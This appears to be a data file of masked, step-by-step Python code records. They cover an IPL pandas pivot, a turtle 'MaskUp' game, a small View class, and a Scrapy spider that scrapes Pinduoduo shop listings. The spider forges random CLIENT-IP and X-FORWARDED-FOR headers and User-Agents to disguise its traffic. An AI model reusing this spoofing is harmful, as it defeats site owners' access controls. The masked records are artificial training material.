{ "blob_id": "4f06d87ec79c20206ff45ba72ab77844076be553", "index": 9707, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')\n df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])\n df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()\n df = df2.pivot(index='match_code', columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')\n df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])\n df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()\n df = df2.pivot(index='match_code', columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\n\nget_runs_counts_by_match()\n", "step-4": "import pandas as pd\nfrom greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df\n\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')\n df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])\n df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()\n df = df2.pivot(index='match_code', columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\n\nget_runs_counts_by_match()\n", "step-5": "\nimport pandas as pd\nfrom greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df(\"data/ipl_dataset.csv\")\n df1 = pd.DataFrame(ipl_df[['match_code','runs','venue']])\n df2 = df1.groupby(['match_code','runs'], as_index=False).count()\n df = df2.pivot(index='match_code',columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\nget_runs_counts_by_match()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import turtle import random import winsound import sys """ new_game = False def toggle_new_game(): global new_game if new_game == False: new_game = True else: new_game = False """ wn = turtle.Screen() wn.title("MaskUp") wn.bgcolor("green") wn.bgpic("retro_city_title_page.gif") wn.setup(width=800, height=600) wn.tracer(0) wn.register_shape("human.gif") def game_loop(): score = 0 lives = 3 wn.register_shape("human.gif") wn.register_shape("Evil-Virus.gif") wn.register_shape("surgical-mask.gif") # Add the player player = turtle.Turtle() player.speed(0) player.shape("human.gif") player.color("white") player.penup() player.goto(0, -250) player.direction = "stop" # Create a list of good guys good_guys = [] # Add the good_guys for _ in range(3): good_guy = turtle.Turtle() good_guy.speed(0) good_guy.shape("surgical-mask.gif") good_guy.color("blue") good_guy.penup() good_guy.goto(-100, 250) good_guy.speed = random.uniform(0.3, 2.0) good_guys.append(good_guy) # Create a list of bad guys bad_guys = [] # Add the bad_guys for _ in range(5): bad_guy = turtle.Turtle() bad_guy.speed(0) bad_guy.shape("Evil-Virus.gif") bad_guy.color("red") bad_guy.penup() bad_guy.goto(100, 250) bad_guy.speed = random.uniform(0.3, 1.0) bad_guys.append(bad_guy) # Make the pen pen = turtle.Turtle() pen.hideturtle() pen.speed(0) pen.shape("square") pen.color("white") pen.penup() pen.goto(0, 260) font = ("Courier", 24, "normal") pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font) # Make the message def show_message(score): message = turtle.Turtle() message.hideturtle() message.speed(0) message.color("yellow") message.penup() message.goto(0, 0) font = ("Calibri", 24, "bold") message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font) # Functions def go_left(): player.direction = "left" def go_right(): player.direction = "right" def stop_player(): player.direction = "stop" # Keyboard Binding wn.listen() wn.onkeypress(go_left, "Left") wn.onkeyrelease(stop_player, "Left") wn.onkeypress(go_right, "Right") wn.onkeyrelease(stop_player, "Right") while True: # Update screen wn.update() # Move the player if player.direction == "left": x = player.xcor() if x > -365: x -= 0.8 player.setx(x) if player.direction == "right": x = player.xcor() if x < 365: x += 0.8 player.setx(x) # Move the good guys for good_guy in good_guys: y = good_guy.ycor() y -= good_guy.speed good_guy.sety(y) # Check if off the screen if y < -300: x = random.randint(-380, 380) y = random.randint(300, 400) good_guy.goto(x, y) # Check for a collision with player if good_guy.distance(player) < 40: x = random.randint(-380, 380) y = random.randint(300, 400) good_guy.goto(x, y) score += 10 pen.clear() pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font) winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME) # Move the bad guys for bad_guy in bad_guys: y = bad_guy.ycor() y -= bad_guy.speed bad_guy.sety(y) # Check if off the screen if y < -300: x = random.randint(-380, 380) y = random.randint(300, 400) bad_guy.goto(x, y) # Check for a collision with player if bad_guy.distance(player) < 40: x = random.randint(-380, 380) y = random.randint(300, 400) bad_guy.goto(x, y) score -= 10 lives -= 1 pen.clear() pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font) winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME) if lives <= 0: pen.clear() bad_guy.clear() good_guy.clear() show_message(score) winsound.PlaySound("game_over_sound", winsound.SND_FILENAME) # wn.listen() # if wn.onkeypress(toggle_new_game, "a"): # if new_game == True: break # wn.onkeypress(sys.exit(), "q") while True: # Update screen wn.update() # Play music wn.bgpic("retro_city.gif") winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP) game_loop() turtle.Screen().clear() wn = turtle.Screen() wn.title("MaskUp") wn.bgcolor("green") wn.bgpic("retro_city_title_page.gif") wn.setup(width=800, height=600) wn.tracer(0) #sys.exit() wn.mainloop()
normal
{ "blob_id": "1593280a29b13461b13d8b2805d9ac53ce94c759", "index": 2948, "step-1": "<mask token>\n", "step-2": "<mask token>\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n", "step-3": "<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n", "step-4": "import turtle\nimport random\nimport winsound\nimport sys\n<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n", "step-5": "\r\nimport turtle\r\nimport random\r\nimport winsound\r\nimport sys\r\n\r\n\r\n\r\n\"\"\" new_game = False\r\n\r\ndef toggle_new_game():\r\n global new_game\r\n if new_game == False:\r\n new_game = True\r\n else:\r\n new_game = False \"\"\"\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"MaskUp\")\r\nwn.bgcolor(\"green\")\r\nwn.bgpic(\"retro_city_title_page.gif\")\r\nwn.setup(width=800, height=600)\r\nwn.tracer(0)\r\nwn.register_shape(\"human.gif\")\r\n\r\n\r\ndef game_loop():\r\n score = 0\r\n lives = 3\r\n\r\n wn.register_shape(\"human.gif\")\r\n wn.register_shape(\"Evil-Virus.gif\")\r\n wn.register_shape(\"surgical-mask.gif\")\r\n\r\n # Add the player\r\n player = turtle.Turtle()\r\n player.speed(0)\r\n player.shape(\"human.gif\")\r\n player.color(\"white\")\r\n player.penup()\r\n player.goto(0, -250)\r\n player.direction = \"stop\"\r\n\r\n\r\n # Create a list of good guys\r\n good_guys = []\r\n\r\n # Add the good_guys\r\n for _ in range(3):\r\n good_guy = turtle.Turtle()\r\n good_guy.speed(0)\r\n good_guy.shape(\"surgical-mask.gif\")\r\n good_guy.color(\"blue\")\r\n good_guy.penup()\r\n good_guy.goto(-100, 250)\r\n good_guy.speed = random.uniform(0.3, 2.0)\r\n good_guys.append(good_guy)\r\n\r\n # Create a list of bad guys\r\n bad_guys = []\r\n\r\n # Add the bad_guys\r\n for _ in range(5):\r\n bad_guy = turtle.Turtle()\r\n bad_guy.speed(0)\r\n bad_guy.shape(\"Evil-Virus.gif\")\r\n bad_guy.color(\"red\")\r\n bad_guy.penup()\r\n bad_guy.goto(100, 250)\r\n bad_guy.speed = random.uniform(0.3, 1.0)\r\n bad_guys.append(bad_guy)\r\n\r\n \r\n # Make the pen\r\n pen = turtle.Turtle()\r\n pen.hideturtle()\r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"white\")\r\n pen.penup()\r\n pen.goto(0, 260)\r\n font = (\"Courier\", 24, \"normal\")\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n\r\n # Make the message\r\n def show_message(score):\r\n message = turtle.Turtle()\r\n message.hideturtle()\r\n message.speed(0)\r\n message.color(\"yellow\")\r\n message.penup()\r\n message.goto(0, 0)\r\n font = (\"Calibri\", 24, \"bold\")\r\n message.write(\"GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!\".format(score), align=\"center\", font=font) \r\n\r\n # Functions\r\n def go_left():\r\n player.direction = \"left\"\r\n\r\n def go_right():\r\n player.direction = \"right\"\r\n\r\n def stop_player():\r\n player.direction = \"stop\"\r\n\r\n # Keyboard Binding\r\n wn.listen()\r\n wn.onkeypress(go_left, \"Left\")\r\n wn.onkeyrelease(stop_player, \"Left\")\r\n wn.onkeypress(go_right, \"Right\")\r\n wn.onkeyrelease(stop_player, \"Right\")\r\n\r\n\r\n \r\n while True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Move the player\r\n if player.direction == \"left\":\r\n x = player.xcor()\r\n if x > -365:\r\n x -= 0.8\r\n player.setx(x)\r\n \r\n if player.direction == \"right\":\r\n x = player.xcor()\r\n if x < 365:\r\n x += 0.8\r\n player.setx(x)\r\n\r\n # Move the good guys\r\n for good_guy in good_guys:\r\n y = good_guy.ycor()\r\n y -= good_guy.speed\r\n good_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if good_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n score += 10\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"video_game_retro_8bit_coin\", winsound.SND_FILENAME)\r\n \r\n # Move the bad guys\r\n for bad_guy in bad_guys:\r\n y = bad_guy.ycor()\r\n y -= bad_guy.speed\r\n bad_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if bad_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n score -= 10\r\n lives -= 1\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"arcade_game_alarm_short\", winsound.SND_FILENAME)\r\n\r\n if lives <= 0:\r\n pen.clear()\r\n bad_guy.clear()\r\n good_guy.clear()\r\n show_message(score)\r\n winsound.PlaySound(\"game_over_sound\", winsound.SND_FILENAME)\r\n # wn.listen()\r\n # if wn.onkeypress(toggle_new_game, \"a\"):\r\n # if new_game == True:\r\n break\r\n # wn.onkeypress(sys.exit(), \"q\")\r\n\r\nwhile True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Play music\r\n wn.bgpic(\"retro_city.gif\")\r\n winsound.PlaySound(\"retro_video_game_music-trimmed\", winsound.SND_LOOP)\r\n game_loop()\r\n turtle.Screen().clear()\r\n \r\n wn = turtle.Screen()\r\n wn.title(\"MaskUp\")\r\n wn.bgcolor(\"green\")\r\n wn.bgpic(\"retro_city_title_page.gif\")\r\n wn.setup(width=800, height=600)\r\n wn.tracer(0)\r\n\r\n #sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\nwn.mainloop()", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
import wizard import report
normal
{ "blob_id": "9d07fd14825ed1e0210fa1f404939f68a3bb039c", "index": 4762, "step-1": "<mask token>\n", "step-2": "import wizard\nimport report\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
from abc import ABC, abstractmethod from raspberry_home.view.geometry import * from raspberry_home.view.renderable import Renderable class View(Renderable, ABC): @abstractmethod def content_size(self, container_size: Size) ->Size: pass
normal
{ "blob_id": "913ff9b811d3abbe43bda0554e40a6a2c87053be", "index": 4449, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass View(Renderable, ABC):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass View(Renderable, ABC):\n\n @abstractmethod\n def content_size(self, container_size: Size) ->Size:\n pass\n", "step-4": "from abc import ABC, abstractmethod\nfrom raspberry_home.view.geometry import *\nfrom raspberry_home.view.renderable import Renderable\n\n\nclass View(Renderable, ABC):\n\n @abstractmethod\n def content_size(self, container_size: Size) ->Size:\n pass\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- import scrapy import json, time, sys, random, re, pyssdb from scrapy.utils.project import get_project_settings from spider.items import GoodsSalesItem goods_list = [] '''获取店铺内产品信息''' class PddMallGoodsSpider(scrapy.Spider): name = 'pdd_mall_goods' mall_id_hash = 'pdd_mall_id_hash' hash_num = 0 ssdb_client = '' process_nums = 1 limit = 100 def __init__(self, hash_num = 0, process_nums = 1): self.ssdb_client = pyssdb.Client(get_project_settings().get('SSDB_HOST'), 8888) self.hash_num = int(hash_num) ##当前脚本号 self.process_nums = int(process_nums) ##脚本总数 self.pageSize = 500 ##每次抓取的产品数 最大只返回500 def start_requests(self): mall_nums = self.limit * int(self.process_nums) ##一次查询的数量 is_end = False start_mall_id = '' ##起始查询的店铺key while not is_end: mall_ids = self.ssdb_client.hkeys(self.mall_id_hash, start_mall_id, '', mall_nums) if not mall_ids: ##没有数据返回 is_end = True continue for mall_id in mall_ids: mall_id = int( mall_id.decode('utf-8') ) start_mall_id = mall_id if mall_id % self.process_nums != self.hash_num: continue goods_list=[] page = 1 headers = self.make_headers() url = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500' meta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list} yield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers) def parse(self, response): pass goods_list=response.meta['goods_list'] ##产品集合 mall_id = response.meta['mall_id'] ##店铺ID page = response.meta['page'] ##每返回一次页面数据 记录页数 mall_goods = response.body.decode('utf-8') ##bytes转换为str mall_goods = json.loads(mall_goods) goods_len = len(mall_goods['goods_list']) if goods_len > 0: goods_list = goods_list + mall_goods['goods_list'] ##合并产品列表 if goods_len > self.pageSize - 100: page += 1 ##继续采集下一页面 url = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500' meta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list} headers = self.make_headers() yield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers) else: if goods_list: item = GoodsSalesItem() item['goods_list'] = goods_list item['mall_id'] = mall_id yield item '''生成headers头信息''' def make_headers(self): chrome_version = str(random.randint(59,63))+'.0.'+str(random.randint(1000,3200))+'.94' headers = { "Host":"yangkeduo.com", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "Accept-Encoding":"gzip, deflate", "Host":"yangkeduo.com", "Referer":"http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026", "Connection":"keep-alive", 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'+chrome_version+' Safari/537.36', } ip = str(random.randint(100, 200))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255)) headers['CLIENT-IP'] = ip headers['X-FORWARDED-FOR']= ip return headers
normal
{ "blob_id": "f33190df35a6b0b91c4dd2d6a58291451d06e29a", "index": 3529, "step-1": "<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n <mask token>\n <mask token>\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' + str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-2": "<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hash_num=0, process_nums=1):\n self.ssdb_client = 